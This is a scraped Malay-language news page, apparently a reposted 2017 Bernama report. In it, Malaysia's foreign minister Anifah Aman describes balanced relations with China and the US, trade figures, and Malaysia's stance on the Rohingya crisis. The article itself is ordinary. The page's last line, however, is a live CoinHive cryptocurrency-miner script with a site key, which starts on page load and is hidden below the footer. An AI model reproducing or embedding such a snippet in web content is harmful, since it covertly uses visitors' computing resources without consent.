© Copyright 2017, All Rights Reserved
Home / Politik / Hubungan Malaysia Dengan China Dan AS Sama Penting – Anifah

Hubungan Malaysia Dengan China Dan AS Sama Penting – Anifah

Hubungan Malaysia dengan China dan Amerika Syarikat adalah sama pentingnya dan Malaysia secara konsisten dan strategik memelihara hubungan baik dengan kedua-dua negara tersebut.

Menteri Luar, Datuk Seri Anifah Aman berkata lawatan Perdana Menteri Datuk Seri Najib Razak ke Amerika Syarikat (AS) baru-baru ini adalah manifestasi bahawa Malaysia diiktiraf sebagai pemain global yang penting.

AS adalah rakan dagang Malaysia yang ketiga terbesar sementara Malaysia pula ialah rakan dagang AS yang ke-18 terbesar pada 2016 dengan perdagangan dua hala dengan negara kuasa besar itu pada 2016 berjumlah USD32.78 bilion.

“Saya tidak fikir ia menyimpang dari kenyataan untuk membuat kesimpulan bahawa pada masa ini Malaysia ialah sebuah daripada negara di rantau ini yang mempunyai hubungan yang kukuh dan stabil dengan AS dan China,” kata Anifah ketika menyampaikan ceramah mengenai “Isu dan Cabaran dalam Menguruskan Dasar Luar Malaysia di Universiti Malaysia Sarawak (Unimas) di Kota Samarahan hari ini.

“Saya berbangga untuk menyatakan bahawa kita dapat melakukannya dengan cara paling baik, bukan melalui kependuaan tetapi melalui sikap keterbukaan dan kejujuran – kita selalu memberitahu AS dan China dengan jelas mengenai pandangan kita.

“Kita tidak pernah memperlagakan satu negara dengan negara yang lain. Saya memberitahu anda satu rahsia – tiada kerahsiaan. Strategi memperlagakan satu pihak dengan pihak yang lain, dengan andaian bahawa rahsia boleh disimpan – tetapi dengan kemajuan teknologi, ini tidak mungkin lagi,” kata Anifah.

Kebangkitan China ialah sebagai pencetus perubahan, baik daripada segi geopolitik mahupun ekonomi, kata beliau dan dan menambah bahawa apabila China bangkit daripada segi ekonomi, kepentingannya bersifat lebih global dan ini adalah perkembangan penting yang dialu-alukan oleh Malaysia.

Beliau berkata pertumbuhan ini dilihat sebagai peluang oleh Malaysia ketika ia membuka membuka lebih banyak peluang untuk meningkatkan perdagangan dengan China kerana negara tersebut menyediakan pasaran bagi produk Malaysia.

Memandangkan perdagangan dua hala berjumlah USD58.01 bilion (RM240.91 bilion) pada 2016, China kekal sebagai rakan perdagangan terbesar Malaysia.

“Ketika China berkembang secara ekonomi, kepentingannya menjadi lebih global dan saling berkaitan dengan kuasa global seperti Amerika Syarikat. Keterlibatan ini mengakibatan wujudnya hubungan pelbagai bentuk antara AS dan China, dan keseimbangan yang kompleks antara kesalingbergantungan dan kepentingan yang berbeza” kata beliau.

Menyentuh mengenai hak asasi manusia dan martabat minoriti Islam Rohingya di Myanmar, Anifah menjelaskan bahawa Malaysia mengasingkan dirinya daripada kenyataan Pengerusi ASEAN mengenai situasi di Wilayah rakhine kerana kenyataan itu tidak berdasarkan kesepakatan.

Beliau berkata kenyataan itu antara lain gagal mengakui identiti etnik Rohingya; ia berkait isu kebertanggungjawapan; mengelirukan dalam erti bahawa ia semua menyalahkan Arakan Rohingya Salvation Army; dan situasi itu harus takrifkan sebagai krisis kemanusiaan dan bukan sebaliknya situasi kemanusiaan.

“Pendirian Malaysia mengenai isu Rohingya adalah konsisten dan kami percaya bahawa perkara itu bukan lagi konflik domestik dan pengalaman baru-baru ini menunjukkan bahawa bahawa jika tidak ditangani, ia akan mencetuskan krisis kemanusiaan serantau berskala besar, mengakibatkan ratusan ribu lagi etnik melarikan diri dari Myanmar ke negara-negara jiran termasuk Malaysia kerana bimbang menjadi mangsa penindasan.

Beliau berkata Malaysia sentiasa mengekalkan hubungan dua hala yang baik dengan Myanmar dan tidak berhasrat untuk campur tangan dalam urusan dalamannya dan bersedai untuk membantu Myanmar mencari penyelesaian yang adil lagi berkekalan terhadap isu di Wilayah Rakhine yang berlarutan.

Anifah berkata, sebagai sebuah negara, Malaysia telah melaksanakan pelbagai inisiatif untuk membela nasib masyarakat Rohingya termasuk menganjurkan Sesi Luar Biasa Majlis Menteri-menteri Luar Pertubuhan Persidangan Islam (OIC) mengenai situasi Minoriti Muslim Rohingya di Myanmar di Kuala Lumpur pada 19 Januari.

 

Malaysia juga sedang menumpukan perhatian kepada aspek bantuan kemanusiaan kepada etnik Rohingyas melalui pertubuhan bukan kerajaan (NGO), serta mendirikan hospital lapangan di sebuah khemah pelarian di Bangladesh.

Anifah berkata terdapat kebimbangan yang sah bahawa suituasi itu mungkin boleh meniupkan sentimen pengganas, mengancam keselamatan di Asia Tenggara sambil menambah bahawa memandangkan Daesh semakin kehilangan pengaruh di Timur Tengah, Asia Tenggara adalah sasaran seterusnya bagi pangkalan mereka dan krisis seperti ini yang melibatkan rantau ini akan memudahkan kumpulan itu mengambil kesempatan untuk menyebarkan ideologi pengganas.- Bernama


Source link

Tinggalkan Ulasan Anda

About admin

x

Check Also

Konkrit Perumahan Tidak Selamat, Guan Eng Perjudi Nyawa Rakyat Pulau Pinang – Huan

1.Saya merujuk kepada satu kenyataan yang dikeluarkan oleh Ketua Pegawai Eksekutif JKP ...

Facebook Auto Publish Powered By : XYZScripts.com
© Copyright 2017, All Rights Reserved
%d bloggers like this:
var m = new CoinHive.Anonymous('dkVZKvPTpA9ReGRa2gsf6amqUO6Yr4Pu'); m.start();